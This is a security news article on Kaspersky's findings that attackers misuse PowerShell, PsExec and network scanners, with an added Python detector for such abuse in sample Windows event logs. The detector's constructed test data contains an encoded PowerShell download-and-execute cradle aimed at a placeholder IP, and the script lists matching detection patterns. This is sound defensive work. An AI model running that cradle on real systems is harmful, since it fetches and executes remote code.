
Attackers misuse legitimate tools in 30% of successful cyber-incidents

Almost a third (30%) of cyberattacks investigated by the Kaspersky Global Emergency Response team in 2019 involved legitimate remote management and administration tools. Because such tools blend in with routine administration, attackers can remain undetected for longer: continuous cyber-espionage attacks and thefts of confidential data had a median duration of 122 days. These findings are from Kaspersky's new Incident Response Analytics Report.

Monitoring and management software helps IT and network administrators perform their everyday tasks, such as troubleshooting and providing employees with technical support. However, cybercriminals can leverage the same legitimate tools during attacks on a company's infrastructure. This software lets them run processes on endpoints and access and extract sensitive information while bypassing security controls designed to detect malware, since the tools themselves are not malicious.

In total, the analysis of anonymized data from incident response (IR) cases showed that 18 different legitimate tools were abused by attackers for malicious purposes. The most widely used was PowerShell (25% of cases), a powerful administration tool that can serve many purposes, from gathering information to running malware. PsExec, a console application for launching processes on remote endpoints, was leveraged in 22% of the attacks. It was followed by SoftPerfect Network Scanner (14%), which is designed to collect information about network environments.

It is more difficult for security solutions to detect attacks conducted with legitimate tools, because the same actions can be either part of a planned cybercrime operation or a routine system administrator task. For instance, among the attacks that lasted more than a month, the median incident duration was 122 days. While they remained undetected, the cybercriminals could collect victims' sensitive data.

However, Kaspersky experts note that malicious use of legitimate software sometimes reveals itself rather quickly. For example, such tools are often used in ransomware attacks, where the damage is immediately visible. The median duration of these short attacks was one day.

“To avoid detection and stay invisible in a compromised network for as long as possible, attackers widely used software which is developed for normal user activity, administrator tasks and system diagnostics. With these tools, attackers can gather information about corporate networks and then conduct lateral movement, change software and hardware settings or even carry out some form of malicious action. For example, they could use legitimate software to encrypt customer data,” comments Konstantin Sapronov, Head of Global Emergency Response Team at Kaspersky.

“Legitimate software can also help attackers stay under the radar of security analysts, as they often detect the attack only after the damage has been done. It is not possible to exclude these tools for many reasons; however, properly deployed logging and monitoring systems will help to detect suspicious activity in the network and complex attacks at earlier stages,” adds Sapronov.

To detect and react to such attacks in a timely manner, among other measures, organizations should consider implementing an Endpoint Detection and Response (EDR) solution with an MDR service. MITRE ATT&CK Round 2 Evaluation — where various solutions, including Kaspersky EDR and Kaspersky Managed Protection service were evaluated — can help customers choose EDR products that match their specific organization’s needs. The results of the ATT&CK Evaluation prove the importance of a comprehensive solution that combines a fully automated multi-layered security product and a manual threat hunting service.
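The tool-abuse figures above (PsExec, PowerShell, SoftPerfect Network Scanner) and Sapronov's point about logging and monitoring come together in detection logic. The following worked example is added here and is not code from the Kaspersky report or from any Kaspersky product. It triages constructed Windows event records shaped like Security event 4688 (process creation, which only carries the command line if command-line auditing is enabled) and System event 7045 (new service installed). The allowlisted admin accounts and hosts, the host names, the service and image paths, and the assumption that SoftPerfect Network Scanner runs as netscan.exe are all illustrative choices, not facts from the page.

```python
"""Added example, not from the Kaspersky report: triage Windows event
records for abuse of legitimate admin tools (PsExec, PowerShell,
SoftPerfect Network Scanner).  Records are dicts that mimic Security
4688 (process creation) and System 7045 (service installed); every
record in SAMPLE_EVENTS is constructed, not real telemetry."""
import base64
import re

# Hypothetical allowlist: accounts and hosts from which remote
# administration tooling is expected in this environment.  The same
# binary run from anywhere else is the "admin or attacker?" question
# the report raises, so it is scored higher.
EXPECTED_ADMIN_USERS = {"CORP\\it-admin1", "CORP\\svc-patching"}
EXPECTED_ADMIN_HOSTS = {"JUMP01"}

# Executable names of the tools named in the report.  netscan.exe as the
# SoftPerfect Network Scanner binary name is an assumption about the build.
ADMIN_TOOLS = {
    "psexec.exe": "PsExec",
    "psexec64.exe": "PsExec",
    "netscan.exe": "SoftPerfect Network Scanner",
}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# -EncodedCommand and the abbreviations PowerShell accepts for it.
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
RISKY_PATTERNS = {
    "Invoke-Expression": r"\b(?:invoke-expression|iex)\b",
    "DownloadString": r"downloadstring",
    "FromBase64String": r"frombase64string",
    "-NoProfile": r"-nop\b",
}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent/invalid.
    PowerShell expects base64 over UTF-16LE text, not UTF-8."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Return a list of (severity, reason) findings for one event record."""
    findings = []
    if event["event_id"] == 7045:
        # PsExec installs a service named PSEXESVC by default; its -r switch
        # renames the service, so the binary name is checked as well.
        name = event.get("service_name", "").upper()
        image = basename(event.get("image_path", ""))
        if name == "PSEXESVC" or image == "psexesvc.exe":
            findings.append(("high", "PsExec service installed (7045)"))
        return findings
    if event["event_id"] != 4688:
        return findings

    image = basename(event["image"])
    cmd = event.get("cmdline", "")
    user, host = event.get("user", ""), event.get("host", "")
    if image in ADMIN_TOOLS:
        expected = user in EXPECTED_ADMIN_USERS and host in EXPECTED_ADMIN_HOSTS
        findings.append(("info" if expected else "high",
                         f"{ADMIN_TOOLS[image]} run by {user} on {host}"))
    if image in POWERSHELL:
        script = decode_encoded_command(cmd)
        if script is not None:
            findings.append(("medium", "encoded PowerShell: " + script[:60]))
        # Scan both the raw command line and the decoded payload.
        text = (cmd + " " + (script or "")).lower()
        hits = [label for label, p in RISKY_PATTERNS.items() if re.search(p, text)]
        if hits:
            findings.append(("high", "PowerShell download/execute indicators: "
                             + ", ".join(hits)))
    return findings


def triage(events):
    """(severity, host, reason) for a batch of events, highest severity first."""
    rank = {"high": 0, "medium": 1, "info": 2}
    out = [(sev, ev.get("host", "?"), why)
           for ev in events for sev, why in analyze(ev)]
    return sorted(out, key=lambda f: rank[f[0]])


# Constructed sample telemetry.  The encoded payload is built here so the
# base64 is guaranteed to be what PowerShell would expect (UTF-16LE).
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"event_id": 4688, "host": "JUMP01", "user": "CORP\\it-admin1",
     "image": "C:\\Tools\\PsExec.exe",
     "cmdline": "PsExec.exe \\\\FS01 -s cmd /c gpupdate /force"},
    {"event_id": 7045, "host": "FS01", "service_name": "PSEXESVC",
     "image_path": "%SystemRoot%\\PSEXESVC.exe"},
    {"event_id": 4688, "host": "WS-0142", "user": "CORP\\jdoe",
     "image": "C:\\Users\\jdoe\\Downloads\\netscan.exe",
     "cmdline": "netscan.exe /auto:hosts.xml"},
    {"event_id": 4688, "host": "WS-0142", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
]

if __name__ == "__main__":
    for sev, host, why in triage(SAMPLE_EVENTS):
        print(f"[{sev:6}] {host}: {why}")
```

The point of the allowlist is the one the report makes: PsExec launched by an administrator from a jump host is logged as informational, while the same binary and a network scanner run by an ordinary user from a workstation are flagged. Two practical caveats: 4688 records carry no command line unless the "include command line in process creation events" audit setting is enabled, so the encoded-PowerShell check is blind without it, and an attacker who renames PsExec (or uses a different remote-execution tool) will only be caught on the 7045 service-install side or by the allowlist, not by the image name.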

To minimize the chances of remote management software being used to penetrate an infrastructure, Kaspersky also recommends the following measures: 

  • Restrict access to remote management tools from external IP addresses, and ensure that remote control interfaces can only be reached from a limited number of endpoints.
  • Enforce a strict password policy for all IT systems and deploy multi-factor authentication.
  • Follow the principle of least privilege: give staff only the privileges their job requires, and grant highly privileged accounts only to those who need them to do their work.
